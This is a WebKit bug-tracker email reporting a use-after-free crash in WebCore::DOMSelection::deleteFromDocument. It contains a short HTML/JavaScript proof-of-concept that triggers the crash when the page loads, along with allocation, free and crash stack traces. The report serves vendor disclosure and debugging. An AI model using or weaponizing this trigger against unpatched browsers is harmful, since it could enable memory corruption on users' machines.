<html>
    <head>
      <base href="https://bugs.webkit.org/" />
    </head>
    <body><table border="1" cellspacing="0" cellpadding="8">
        <tr>
          <th>Bug ID</th>
          <td><a class="bz_bug_link 
          bz_status_NEW "
   title="NEW - WebCore::DOMSelection::deleteFromDocument use after free"
   href="https://bugs.webkit.org/show_bug.cgi?id=167232">167232</a>
          </td>
        </tr>

        <tr>
          <th>Summary</th>
          <td>WebCore::DOMSelection::deleteFromDocument use after free
          </td>
        </tr>

        <tr>
          <th>Classification</th>
          <td>Unclassified
          </td>
        </tr>

        <tr>
          <th>Product</th>
          <td>WebKit
          </td>
        </tr>

        <tr>
          <th>Version</th>
          <td>WebKit Local Build
          </td>
        </tr>

        <tr>
          <th>Hardware</th>
          <td>Unspecified
          </td>
        </tr>

        <tr>
          <th>OS</th>
          <td>Unspecified
          </td>
        </tr>

        <tr>
          <th>Status</th>
          <td>NEW
          </td>
        </tr>

        <tr>
          <th>Severity</th>
          <td>Normal
          </td>
        </tr>

        <tr>
          <th>Priority</th>
          <td>P2
          </td>
        </tr>

        <tr>
          <th>Component</th>
          <td>New Bugs
          </td>
        </tr>

        <tr>
          <th>Assignee</th>
          <td>webkit-unassigned&#64;lists.webkit.org
          </td>
        </tr>

        <tr>
          <th>Reporter</th>
          <td>yuanvi.cn&#64;gmail.com
          </td>
        </tr></table>
      <p>
        <div>
        <pre>Environment:
windows 7 Ultimate 64bit
webkit local build with latest git commit d4c655ed0c90d076a473605d752c16adb321764e
enable page heap for MiniBrowser.exe


PoC:
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function start() {
    document.getElementById('input_0').disabled = true;
    document.getElementById('input_0').setRangeText(319, 193, 273);
    window.getSelection().extend(document.getElementById('input_0'));
    window.getSelection().deleteFromDocument();
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload=&quot;start();&quot;&gt;
    &lt;input id=input_0 type=&quot;search&quot; name=&quot;fname&quot;&gt;&lt;br&gt;
&lt;/body&gt;
&lt;/html&gt;


Discription:
Use MiniBrowser open the PoC file, it will cause a uaf crash on {WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp &#64; 715]}. Note, this reduced PoC won't crash without enable page heap. 
I did not investigate this crash thoroughly, so I cannot determine if it is easy exploitable.


Stack backtrace:
RtlAllocateHeap record:
    WTF+00059cfc WTF!_malloc_base+0x38 [d:\th\minkernel\crts\ucrt\src\appcrt\heap\malloc_base.cpp &#64; 29]
    WTF+0000645b WTF!WTF::fastMalloc+0xb [d:\webkit\source\wtf\wtf\fastmalloc.cpp &#64; 182]
    WebKit+0078d25b WebKit!WebCore::SearchFieldCancelButtonElement::create+0xb [d:\webkit\source\webcore\html\shadow\textcontrolinnerelements.cpp &#64; 222]
    WebKit+007a9134 WebKit!WebCore::SearchInputType::createShadowSubtree+0xa4 [d:\webkit\source\webcore\html\searchinputtype.cpp &#64; 117]
    WebKit+00449701 WebKit!WebCore::HTMLInputElement::didAddUserAgentShadowRoot+0x11 [d:\webkit\source\webcore\html\htmlinputelement.cpp &#64; 146]
    WebKit+00126def WebKit!WebCore::Element::ensureUserAgentShadowRoot+0x4f [d:\webkit\source\webcore\dom\element.cpp &#64; 1857]
    WebKit+0046bb4f WebKit!WebCore::HTMLInputElement::initializeInputType+0xbf [d:\webkit\source\webcore\html\htmlinputelement.cpp &#64; 663]
    WebKit+001267d4 WebKit!WebCore::Element::parserSetAttributes+0xa4 [d:\webkit\source\webcore\dom\element.cpp &#64; 1528]
    WebKit+0089160a WebKit!WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface+0x20a [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp &#64; 685]
    WebKit+0088f524 WebKit!WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement+0x14 [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp &#64; 507]
    WebKit+00894369 WebKit!WebCore::HTMLTreeBuilder::processStartTagForInBody+0x6a9 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp &#64; 754]
    WebKit+00892e4b WebKit!WebCore::HTMLTreeBuilder::processStartTag+0x54b [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp &#64; 1095]
    WebKit+00892713 WebKit!WebCore::HTMLTreeBuilder::constructTree+0x23 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp &#64; 356]
    WebKit+006e8684 WebKit!WebCore::HTMLDocumentParser::pumpTokenizerLoop+0x224 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp &#64; 260]
    WebKit+006e839a WebKit!WebCore::HTMLDocumentParser::pumpTokenizer+0x6a [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp &#64; 284]
    WebKit+006e7ea4 WebKit!WebCore::HTMLDocumentParser::append+0x194 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp &#64; 391]
    WebKit+00144c75 WebKit!WebCore::DecodedDataDocumentParser::appendBytes+0x65 [d:\webkit\source\webcore\dom\decodeddatadocumentparser.cpp &#64; 50]
    WebKit+006c0f5c WebKit!WebCore::DocumentWriter::addData+0x2c [d:\webkit\source\webcore\loader\documentwriter.cpp &#64; 254]
    WebKit+0019287d WebKit!WebCore::DocumentLoader::commitData+0x19d [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 952]
    WebKit+000db050 WebKit!WebFrameLoaderClient::committedLoad+0x20 [d:\webkit\source\webkit\win\webcoresupport\webframeloaderclient.cpp &#64; 673]
    WebKit+001932d5 WebKit!WebCore::DocumentLoader::commitLoad+0x75 [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 869]
    WebKit+0019432c WebKit!WebCore::DocumentLoader::dataReceived+0x7c [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 984]
    WebKit+00193d7e WebKit!WebCore::DocumentLoader::dataReceived+0xe [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 958]
    WebKit+00717a8a WebKit!WebCore::CachedRawResource::notifyClientsDataWasReceived+0x4a [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp &#64; 118]
    WebKit+007175ab WebKit!WebCore::CachedRawResource::addDataBuffer+0x9b [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp &#64; 69]
    WebKit+0019f30e WebKit!WebCore::SubresourceLoader::didReceiveDataOrBuffer+0x8e [d:\webkit\source\webcore\loader\subresourceloader.cpp &#64; 391]
    WebKit+0019ec68 WebKit!WebCore::SubresourceLoader::didReceiveBuffer+0x28 [d:\webkit\source\webcore\loader\subresourceloader.cpp &#64; 371]
    WebKit+00199e44 WebKit!WebCore::ResourceLoader::didReceiveBuffer+0x14 [d:\webkit\source\webcore\loader\resourceloader.cpp &#64; 635]
    WebKit+0071e9e3 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didReceiveData+0x33 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp &#64; 185]
    WebKit+0071e581 WebKit!WebCore::ResourceHandleCFURLConnectionDelegate::didReceiveDataCallback+0x11 [d:\webkit\source\webcore\platform\network\cf\resourcehandlecfurlconnectiondelegate.cpp &#64; 84]
    CFNetwork+0015c5b9 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xc579:

RtlFreeHeap record:
    kernel32+000114dd kernel32!HeapFree+0x14:
    WTF+000583e5 WTF!_free_base+0x1c [d:\th\minkernel\crts\ucrt\src\appcrt\heap\free_base.cpp &#64; 107]
    WebKit+00467bcd WebKit!WebCore::HTMLParamElement::`scalar deleting destructor'+0x1d:
    WebKit+0016b906 WebKit!WebCore::RangeBoundaryPoint::~RangeBoundaryPoint+0x36:
    WebKit+00138e6f WebKit!WebCore::Range::deleteContents+0x1f [d:\webkit\source\webcore\dom\range.cpp &#64; 470]
    WebKit+007620e3 WebKit!WebCore::DOMSelection::deleteFromDocument+0x63 [d:\webkit\source\webcore\page\domselection.cpp &#64; 378]
    WebKit+00983439 WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp &#64; 459]
    +0000347d Error(Call IDebugControl::ExecuteWide failed    HRESULT 0x80040205)
    JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm &#64; 7940]
    JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm &#64; 7940]
    JavaScriptCore+004ee93d JavaScriptCore!vmEntryToJavaScript+0x10d [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm &#64; 114]
    JavaScriptCore+002769d7 JavaScriptCore!JSC::JITCode::execute+0x57 [d:\webkit\source\javascriptcore\jit\jitcode.cpp &#64; 81]
    JavaScriptCore+0025a061 JavaScriptCore!JSC::Interpreter::executeCall+0x191 [d:\webkit\source\javascriptcore\interpreter\interpreter.cpp &#64; 927]
    JavaScriptCore+0038284f JavaScriptCore!JSC::call+0x4f [d:\webkit\source\javascriptcore\runtime\calldata.cpp &#64; 47]
    JavaScriptCore+003829b9 JavaScriptCore!JSC::profiledCall+0x59 [d:\webkit\source\javascriptcore\runtime\calldata.cpp &#64; 65]
    WebKit+004f5942 WebKit!WebCore::JSMainThreadExecState::profiledCall+0x62 [d:\webkit\source\webcore\bindings\js\jsmainthreadexecstate.h &#64; 75]
    WebKit+004cbb1e WebKit!WebCore::JSEventListener::handleEvent+0x3ee [d:\webkit\source\webcore\bindings\js\jseventlistener.cpp &#64; 143]
    WebKit+0010289e WebKit!WebCore::EventTarget::fireEventListeners+0xfe [d:\webkit\source\webcore\dom\eventtarget.cpp &#64; 253]
    WebKit+001026f4 WebKit!WebCore::EventTarget::fireEventListeners+0xd4 [d:\webkit\source\webcore\dom\eventtarget.cpp &#64; 200]
    WebKit+002bcdb0 WebKit!WebCore::DOMWindow::dispatchEvent+0x100 [d:\webkit\source\webcore\page\domwindow.cpp &#64; 1994]
    WebKit+002bce83 WebKit!WebCore::DOMWindow::dispatchLoadEvent+0x83 [d:\webkit\source\webcore\page\domwindow.cpp &#64; 1952]
    WebKit+001137a8 WebKit!WebCore::Document::implicitClose+0x178 [d:\webkit\source\webcore\dom\document.cpp &#64; 2663]
    WebKit+002aedb4 WebKit!WebCore::FrameLoader::checkCompleted+0x84 [d:\webkit\source\webcore\loader\frameloader.cpp &#64; 825]
    WebKit+002aecef WebKit!WebCore::FrameLoader::finishedParsing+0x5f [d:\webkit\source\webcore\loader\frameloader.cpp &#64; 746]
    WebKit+00193dc6 WebKit!WebCore::DocumentLoader::notifyFinished+0x36 [d:\webkit\source\webcore\loader\documentloader.cpp &#64; 399]
    WebKit+00637e6c WebKit!WebCore::CachedResource::finishLoading+0xc [d:\webkit\source\webcore\loader\cache\cachedresource.cpp &#64; 328]
    WebKit+0019ed5a WebKit!WebCore::SubresourceLoader::didFinishLoading+0xca [d:\webkit\source\webcore\loader\subresourceloader.cpp &#64; 545]
    WebKit+00199e65 WebKit!WebCore::ResourceLoader::didFinishLoading+0x15 [d:\webkit\source\webcore\loader\resourceloader.cpp &#64; 641]
    WebKit+0071ea34 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didFinishLoading+0x24 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp &#64; 193]
    CFNetwork+0015a2a1 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xa261:

Crash:
    0046ec2c 6cb67aa6 WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp &#64; 715]
    0046ec4c 6cb65a1b WebKit!WebCore::RenderSearchField::computeControlLogicalHeight+0xb6 [d:\webkit\source\webcore\rendering\rendersearchfield.cpp &#64; 148]
    0046ec88 6ca8a533 WebKit!WebCore::RenderTextControl::computeLogicalHeight+0xab [d:\webkit\source\webcore\rendering\rendertextcontrol.cpp &#64; 104]
    0046ecbc 6cabb9de WebKit!WebCore::RenderBox::updateLogicalHeight+0x43 [d:\webkit\source\webcore\rendering\renderbox.cpp &#64; 2780]
    0046ecd4 6cabac37 WebKit!WebCore::RenderBlockFlow::updateLogicalHeight+0xe [d:\webkit\source\webcore\rendering\renderblockflow.cpp &#64; 3227]
    0046ed68 6cb66493 WebKit!WebCore::RenderBlockFlow::layoutBlock+0x457 [d:\webkit\source\webcore\rendering\renderblockflow.cpp &#64; 544]
    0046eda8 6cca124c WebKit!WebCore::RenderTextControlSingleLine::layout+0xf3 [d:\webkit\source\webcore\rendering\rendertextcontrolsingleline.cpp &#64; 119]
    0046ee10 6c8a22df WebKit!WebCore::FrameView::layout+0x5ac [d:\webkit\source\webcore\page\frameview.cpp &#64; 1492]
    0046ee30 6c8a237a WebKit!WebCore::Document::updateLayout+0xcf [d:\webkit\source\webcore\dom\document.cpp &#64; 1907]
    0046ee44 6c9bef1e WebKit!WebCore::Document::updateLayoutIgnorePendingStylesheets+0x7a [d:\webkit\source\webcore\dom\document.cpp &#64; 1941]
    0046eeb8 6c9bedc5 WebKit!WebCore::VisiblePosition::canonicalPosition+0x7e [d:\webkit\source\webcore\editing\visibleposition.cpp &#64; 562]
    0046eeec 6c9c23f5 WebKit!WebCore::VisiblePosition::init+0x25 [d:\webkit\source\webcore\editing\visibleposition.cpp &#64; 60]
    0046ef3c 6c9c227e WebKit!WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents+0x45 [d:\webkit\source\webcore\editing\visibleselection.cpp &#64; 250]
    0046ef58 6c9c1056 WebKit!WebCore::VisibleSelection::validate+0xe [d:\webkit\source\webcore\editing\visibleselection.cpp &#64; 422]
    0046ef68 6c9c4572 WebKit!WebCore::VisibleSelection::VisibleSelection+0xa6 [d:\webkit\source\webcore\editing\visibleselection.cpp &#64; 67]
    0046efe8 6cef1274 WebKit!WebCore::FrameSelection::moveTo+0x32 [d:\webkit\source\webcore\editing\frameselection.cpp &#64; 165]
    0046f02c 6cef212d WebKit!WebCore::DOMSelection::setBaseAndExtent+0x94 [d:\webkit\source\webcore\page\domselection.cpp &#64; 216]
    0046f068 6d113439 WebKit!WebCore::DOMSelection::deleteFromDocument+0xad [d:\webkit\source\webcore\page\domselection.cpp &#64; 379]
    0046f088 0a08347d WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp &#64; 459]</pre>
        </div>
      </p>
      <hr>
      <span>You are receiving this mail because:</span>
      
      <ul>
          <li>You are the assignee for the bug.</li>
      </ul>
    </body>
</html>